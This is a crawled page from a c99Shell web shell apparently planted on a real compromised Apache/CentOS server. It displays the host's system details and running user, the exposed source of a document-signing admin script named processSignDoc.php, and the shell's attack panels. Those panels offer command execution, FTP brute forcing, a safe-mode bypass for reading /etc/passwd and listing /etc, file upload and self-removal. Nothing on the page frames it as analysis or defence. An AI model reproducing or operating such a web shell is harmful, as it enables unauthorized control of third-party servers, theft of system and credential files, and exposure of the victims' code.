110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/admin/ drwxr-xr-x Free 52.33 GB of 127.8 GB (40.95%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/ drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: processSignDoc.php (5.6 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

BeginTrans(); $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DsID="3"; $flagCommit = $oDoc->Save(); } $oRs->SearchByKey($DrsID); $oRs->GetRecord(); $oRs->Edit(); $oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s'); //echo "DrsSendDate=".$oRs->DrsSendDate; if($cansend!="Y"){ //$oRs->DrsSendPersonId=$DlcPsId; $oRs->DrsSendPersonId=''; }else if($cansend=="Y"){ $oRs->DrsSendPersonId=$personId; } //echo "DrsSendPersonId=".$oRs->DrsSendPersonId; if($cansend!="Y"){ $oRs->DrsSendDlcID=$DlcPs; }else if($cansend=="Y"){ $oRs->DrsSendDlcID=$DlcIDlogin; } //echo "DrsSendDlcID=".$oRs->DrsSendDlcID; $oRs->DrsSign=$DrsSign; $flagCommit = $oRs->Save(); //---------------add DocReceiveSend $oRs1->AddNew(); $oRs1->DrsID=$oRs1->GetNextCode(); $oRs1->DocID=$DocID; if($cansend!="Y"){ $oRs1->DlcID=$DlcPs; }else if($cansend=="Y"){ $oRs1->DlcID=$DlcIDlogin; } $oRs1->DsID=3; $oRs1->PtID=$oRs->PtID; $oRs1->DrsDocTypeNo=$oRs->DrsDocTypeNo; $oRs1->DrsReceiveDate=$oRs->DrsSendDate; //$oRs1->DrsReceivePersonId=$DlcPsId; $oRs1->DrsReceivePersonId=''; $oRs1->DrsDocDueDate=$oRs->DrsDocDueDate; $oRs1->DrsDlcIDCreate=$DlcIDlogin; $oRs1->DrsPsIDCreate=$personId; $oRs1->DrsPropose=$oRs->DrsPropose; $oRs1->DrsSign=$DrsSign; $oRs1->DrsFromDrsID=$oRs->DrsID; //echo "DrsFromDrsID=".$oRs1->DrsFromDrsID; $oRs1->DocGroup=$oRs->DocGroup; if($cansend!="Y"){ $oRs1->DrsSend=$oRs1->DrsSend; }else if($cansend=="Y"){ $oRs1->DrsSend="Y"; } $oRs1->AnID=$oRs->AnID; $oRs1->DrsstartDatePost=$oRs->DrsstartDatePost; $oRs1->DrsendDatePost=$oRs->DrsendDatePost; $flagCommit = $oRs1->Save(); if($DocForSign==1 && $DocPID!="0"){ $oDlc->SearchByKey($DlcIDlogin); $oDlc->GetRecord(); $oRs2->SearchDeptSendDocforSign($oDoc->DocID); $oRs2->GetRecord(); $oRs3->SearchByKey($oRs2->DrsFromDrsID); $oRs3->GetRecord(); $oDfs->AddNew(); $oDfs->dfID=$oDfs->GetNextCode(); $oDfs->DocID=$oRs3->DocID; $oDfs->DlcID=$oRs2->DrsDlcIDCreate; $oDfs->DocGroup=$oRs3->DocGroup; $oDfs->DlcIDsign=$DlcIDlogin; $oDfs->DeptSign=$oDlc->deptId; $oDfs->Save(); //echo $oRs8->DrsID.'--'.$oRs8->DrsDlcIDCreate.'--'.$oRs8->DrsPsIDCreate.'-'.$oRs8->DrsFromDrsID; } if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); if($DocForSign==1 && $DocPID!="0"){ echo ""; }else{ if($cansend=="Y"){ if($oDoc->RsID!='2'){ $fn="showSendDoc.php"; }else{ $fn="showSendDocSR.php"; } echo ""; }else{ echo ""; } } }else if($method=="addsignDocforSign"){ $flagCommit = true; $oC->BeginTrans(); $oDoc->SearchByKey($DocID); if($oDoc->GetRecord()=="1"){ $oDoc->Edit(); $oDoc->DsID="3"; $flagCommit = $oDoc->Save(); } $oRs->SearchByKey($DrsID); $oRs->GetRecord(); $oRs->Edit(); $oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s'); if($cansend!="Y"){ $oRs->DrsSendPersonId=''; }else if($cansend=="Y"){ $oRs->DrsSendPersonId=$personId; } if($cansend!="Y"){ $oRs->DrsSendDlcID=$DlcPs; }else if($cansend=="Y"){ $oRs->DrsSendDlcID=$DlcIDlogin; } $oRs->DrsSign=$DrsSign; $flagCommit = $oRs->Save(); if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); echo ""; }else if($method=="addWsign"){ $flagCommit = true; $oC->BeginTrans(); $oRs->SearchByKey($DrsID); $oRs->GetRecord(); $oRs->Edit(); $oRs->DrsWSign='Y'; $flagCommit = $oRs->Save(); $oDws->AddNew(); $oDws->wID=$oDws->GetNextCode(); $oDws->DocID=$oRs->DocID; $oDws->DrsID=$DrsID; $oDws->signDateTime=getNowDateTh()." ".date('H:i:s'); $oDws->DlcID=$oRs->DlcID; $oDws->personId=$oRs->DrsReceivePersonId ; $oDws->DocSign=$DrsSign; $oDws->DocGroup=$oRs->DocGroup; $flagCommit = $oDws->Save(); if($flagCommit) $oC->CommitTrans(); else $oC->RollbackTrans(); echo ""; } ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--